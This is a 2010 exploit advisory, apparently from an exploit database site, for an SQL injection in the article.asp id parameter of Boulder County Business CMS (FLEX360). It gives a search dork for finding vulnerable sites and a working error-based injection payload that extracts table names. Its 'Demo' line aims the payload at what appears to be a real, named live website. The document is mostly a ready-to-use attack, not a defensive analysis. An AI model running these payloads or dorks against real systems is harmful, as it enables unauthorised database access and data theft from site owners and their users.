Boulder County Business Cms SQL Injection Vulnerability

Text :

#################################################################

[+] Exploit Title: Boulder County Business Cms SQL Injection Vulnerability

[+] Date: 2010-02-10

[+] Author: Ashiyane Digital Security Members (Cair3x)

[+] Software Link: http://www.flex360.com/

[+] Version: -

[+] Tested on: -

[+] Dork: Powered by FLEX360

#################################################################

Vulnerable script: article.asp?id= [SQL Injection]

[ Vulnerability ]

Http://Site.ir/article.asp?id=[SQL Injection]

[ Exploit ]

http://www.Site.com/article.asp?id=103374 and 1=convert(int,(select top 1
table_name from information_schema.tables))--sp_password

[Demo]

http://www.bcbr.com/article.asp?id=103374 and 1=convert(int,(select top 1
table_name from information_schema.tables))--sp_password

BY : Cair3x [Cair3x.Support@Gmail.com]

Web Site : Ashiyane.org

Forum : Http://Ashiyane.org/forums/

[+] Greetz to All Ashiyane Digital Security Member (And Virangar Good
Frinds)

######

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason